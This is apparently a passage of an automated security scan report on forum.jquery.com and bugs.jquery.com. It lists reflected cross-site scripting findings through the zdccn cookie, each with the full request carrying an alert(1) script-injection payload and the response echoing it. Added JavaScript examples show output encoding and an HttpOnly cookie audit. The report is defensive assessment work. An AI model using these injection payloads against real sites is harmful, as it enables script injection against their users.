1.279. http://forum.jquery.com/user/christophe [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/christophe

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d8c9"><script>alert(1)</script>c36392dba09 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /user/christophe HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb1d8c9"><script>alert(1)</script>c36392dba09;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=CDB738F70C802B993C1EAC3A9CDC9639; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:36:16 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb1d8c9"><script>alert(1)</script>c36392dba09"/>
...[SNIP]...

1.280. http://forum.jquery.com/user/jeresig [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/jeresig

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20c61"-alert(1)-"9dded2314a0 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /user/jeresig HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb20c61"-alert(1)-"9dded2314a0;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=AFFD3695C6A1B4899C0B6D89338AEBA0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:35:12 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb20c61"-alert(1)-"9dded2314a0";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.281. http://forum.jquery.com/user/jeresig [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/jeresig

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de16"><script>alert(1)</script>302caaaea60 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /user/jeresig HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb1de16"><script>alert(1)</script>302caaaea60;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D96A0F29D5F3C7A3CA27C45CF47D3163; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:03 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb1de16"><script>alert(1)</script>302caaaea60"/>
...[SNIP]...

1.282. http://forum.jquery.com/user/kbwood.au [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/kbwood.au

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c62f0"-alert(1)-"f8d6c6dc3fd was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /user/kbwood.au HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbc62f0"-alert(1)-"f8d6c6dc3fd;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=97E4E92BE4AEDB96ACB501A683A1B9A5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:37:08 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbbc62f0"-alert(1)-"f8d6c6dc3fd";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.283. http://forum.jquery.com/user/kbwood.au [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/kbwood.au

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a619a"><script>alert(1)</script>a965955940b was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /user/kbwood.au HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbba619a"><script>alert(1)</script>a965955940b;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=B263E533E3F581956D9FE0C35D2DD655; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:36:07 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbba619a"><script>alert(1)</script>a965955940b"/>
...[SNIP]...

1.284. http://forum.jquery.com/user/scottjehl [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/scottjehl

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f792"-alert(1)-"a3b68d9dc15 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /user/scottjehl HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb8f792"-alert(1)-"a3b68d9dc15;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=14A669DE6272A941768E7925021199D2; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:50 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb8f792"-alert(1)-"a3b68d9dc15";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.285. http://forum.jquery.com/user/scottjehl [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/scottjehl

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c604"><script>alert(1)</script>054deb72aea was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /user/scottjehl HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb6c604"><script>alert(1)</script>054deb72aea;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=6F0ACDD3561A068936408D33E591266D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:33:34 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb6c604"><script>alert(1)</script>054deb72aea"/>
...[SNIP]...

1.286. http://forum.jquery.com/user/wycats [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/wycats

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f07ad"-alert(1)-"d8cb1ced23d was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /user/wycats HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbf07ad"-alert(1)-"d8cb1ced23d;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=65F748435D03AB0128EDDDB5A5F0DDF7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:35:49 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbbf07ad"-alert(1)-"d8cb1ced23d";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.287. http://forum.jquery.com/user/wycats [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/wycats

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51e8a"><script>alert(1)</script>584a7ed4c4 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /user/wycats HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb51e8a"><script>alert(1)</script>584a7ed4c4;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=878EA3BDF0049AC830DD8D9F91AE07FB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:26 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb51e8a"><script>alert(1)</script>584a7ed4c4"/>
...[SNIP]...

1.288. http://forum.jquery.com/using-jquery [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /using-jquery

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0de5"><script>alert(1)</script>07af53c395e was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /using-jquery HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbb0de5"><script>alert(1)</script>07af53c395e;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:21:56 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbbb0de5"><script>alert(1)</script>07af53c395e"/>
...[SNIP]...
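
The findings above all reflect the same value: the zdccn cookie is emitted as the page's CSRF token (zdrpn), once inside a double-quoted JavaScript string (`var csrfToken = "..."`) and once inside a double-quoted HTML attribute (`<input type="hidden" name="zdrpn" value="..."/>`), and in both places the report shows it echoed without encoding. The following is an added example, not code from the scan report or from the forum application. It re-creates both sinks, applies the encoding appropriate to each context, and parses the output back the way a browser would to show that the report's two payloads no longer break out. JS_PAYLOAD and ATTR_PAYLOAD are copied from findings 1.278 and 1.279; the render* and extract* functions are hypothetical stand-ins for the server-side template and for the browser's parser.

```javascript
// Added example: the two reflection contexts the report documents, rendered
// raw (as in the responses) and with context-specific output encoding.
// Payloads exactly as submitted in the zdccn cookie in findings 1.278 and 1.279.
const JS_PAYLOAD = '62213a1a-db44-432f-a0e7-c5eb57ba4dbb21b6d"-alert(1)-"cdf3c757657';
const ATTR_PAYLOAD =
  '62213a1a-db44-432f-a0e7-c5eb57ba4dbb1d8c9"><script>alert(1)</script>c36392dba09';

// HTML attribute context: entity-encode the characters that can end a
// double-quoted value or start new markup.
function encodeForHtmlAttribute(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string context inside an inline <script>: JSON-encode so a quote
// cannot close the literal, then \u-escape <, >, & and the U+2028/U+2029 line
// terminators so the value can neither close the <script> element nor split
// the literal across lines.
function encodeForJsString(s) {
  return JSON.stringify(String(s)).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Raw interpolation, as the report's responses show it (hypothetical template).
function renderUnsafe(token) {
  return {
    script: `var csrfToken = "${token}";`,
    input: `<input type="hidden" name="zdrpn" value="${token}"/>`,
  };
}

// Same two sinks with per-context encoding applied at the point of output.
function renderSafe(token) {
  return {
    script: `var csrfToken = ${encodeForJsString(token)};`,
    input: `<input type="hidden" name="zdrpn" value="${encodeForHtmlAttribute(token)}"/>`,
  };
}

// Read the fragment back roughly the way a browser would. A script fragment
// whose right-hand side is not a single JSON string literal, or an attribute
// whose decoded value differs from the token, means the payload broke out.
function extractScriptToken(fragment) {
  const m = /^var csrfToken = (.*);$/.exec(fragment);
  if (!m) return null;
  try { return JSON.parse(m[1]); } catch (e) { return null; }
}

function decodeHtmlEntities(s) {
  const map = { amp: '&', lt: '<', gt: '>', quot: '"', '#x27': "'" };
  return s.replace(/&(amp|lt|gt|quot|#x27);/g, (_, e) => map[e]);
}

function extractAttributeToken(fragment) {
  const m = /value="([^"]*)"/.exec(fragment);
  return m ? decodeHtmlEntities(m[1]) : null;
}

// Number of tags in the fragment; the template itself emits exactly one.
function countTags(fragment) {
  return (fragment.match(/<[a-zA-Z\/]/g) || []).length;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderUnsafe(JS_PAYLOAD).script);   // the broken-out literal from 1.278
  console.log(renderSafe(JS_PAYLOAD).script);     // one intact string literal
  console.log(renderUnsafe(ATTR_PAYLOAD).input);  // three tags: input, script, /script
  console.log(renderSafe(ATTR_PAYLOAD).input);    // one tag, payload entity-encoded
}
```

The encoding must match the context the value lands in: attribute encoding alone would not help inside the script block, and JSON encoding alone would not help inside the attribute. The report's stronger recommendation, not echoing user data into script context at all, is also reachable from here: with the hidden input encoded as in renderSafe, the page's script can read the token from the DOM instead of from an inline literal.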

2. Cookie without HttpOnly flag set
There are 34 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
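
The following is an added example, not code from the scan report or from either application, showing the check behind this finding and its fix: parse each Set-Cookie header, flag cookies issued without HttpOnly (and, for an https origin, without Secure), and emit the corrected header. The three sample headers are the ones the report shows in the bugs.jquery.com and forum.jquery.com responses; the fourth is a constructed variant with both flags present, for contrast. The "looks like a session token" heuristic is ours, not the scanner's. Note the caveat from the background text applies here too: on forum.jquery.com the CSRF token is written into the page itself, so HttpOnly on JSESSIONID would limit what an injected script can read, not what it can do in-session.

```javascript
// Added example: audit Set-Cookie headers for the HttpOnly (and Secure) flag.
const SAMPLE_HEADERS = [
  // From the report's responses:
  'Set-Cookie: trac_form_token=fb447b3831e75a8e953d1043; Path=/',
  'Set-Cookie: trac_session=7449c302e08b5599f25f977d; expires=Mon, 14-Feb-2011 02:34:39 GMT; Path=/',
  'Set-Cookie: JSESSIONID=5B7FED8F2238C535DF4F28A8A27FB530; Path=/',
  // Constructed counter-example, not from the report: the same cookie, correctly flagged.
  'Set-Cookie: JSESSIONID=5B7FED8F2238C535DF4F28A8A27FB530; Path=/; HttpOnly; Secure',
];

// Split "k=v" at the first "=" only: cookie values may themselves contain "=".
function splitPair(s) {
  const i = s.indexOf('=');
  return i === -1 ? [s.trim(), ''] : [s.slice(0, i).trim(), s.slice(i + 1).trim()];
}

// Parse one Set-Cookie header, with or without the "Set-Cookie:" prefix.
// HttpOnly and Secure are flag attributes (no value); everything else is kept
// by lower-cased name.
function parseSetCookie(header) {
  const parts = header.replace(/^set-cookie:\s*/i, '').split(';')
    .map((p) => p.trim()).filter((p) => p.length > 0);
  const [name, value] = splitPair(parts[0]);
  const cookie = { name, value, httpOnly: false, secure: false, attributes: {} };
  for (const part of parts.slice(1)) {
    const [k, v] = splitPair(part);
    const key = k.toLowerCase();
    if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
    else cookie.attributes[key] = v;
  }
  return cookie;
}

// Heuristic (ours) for raising a finding's priority: a session-ish name, or a
// value that is one long hex string, typical of server-generated session ids.
const SESSION_NAME = /sess|sid|token|auth|login/i;
function looksLikeSessionToken(cookie) {
  return SESSION_NAME.test(cookie.name) || /^[0-9a-f]{16,}$/i.test(cookie.value);
}

// One finding per missing flag per cookie. Secure is only checked when the
// caller says the cookie was set over https.
function auditSetCookieHeaders(headers, options = {}) {
  const https = options.https === true;
  const findings = [];
  for (const header of headers) {
    const c = parseSetCookie(header);
    const sessionLike = looksLikeSessionToken(c);
    if (!c.httpOnly) findings.push({ cookie: c.name, issue: 'missing HttpOnly', sessionLike });
    if (https && !c.secure) findings.push({ cookie: c.name, issue: 'missing Secure', sessionLike });
  }
  return findings;
}

// The remediation from the report: add HttpOnly to any Set-Cookie that lacks it.
function withHttpOnly(header) {
  return parseSetCookie(header).httpOnly ? header : header.replace(/\s+$/, '') + '; HttpOnly';
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of auditSetCookieHeaders(SAMPLE_HEADERS)) {
    console.log(`${f.cookie}: ${f.issue}${f.sessionLike ? ' (session-like)' : ''}`);
  }
  console.log(withHttpOnly(SAMPLE_HEADERS[2]));
}
```

Running the audit over the four sample headers reports the three cookies from the report (trac_form_token, trac_session, JSESSIONID) as missing HttpOnly and leaves the flagged variant alone; passing `{ https: true }` adds a missing-Secure finding for each of the three as well.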



2.1. http://bugs.jquery.com/newticket

Summary

Severity:   Low
Confidence:   Firm
Host:   http://bugs.jquery.com
Path:   /newticket

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: trac_form_token and trac_session. The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newticket HTTP/1.1
Host: bugs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
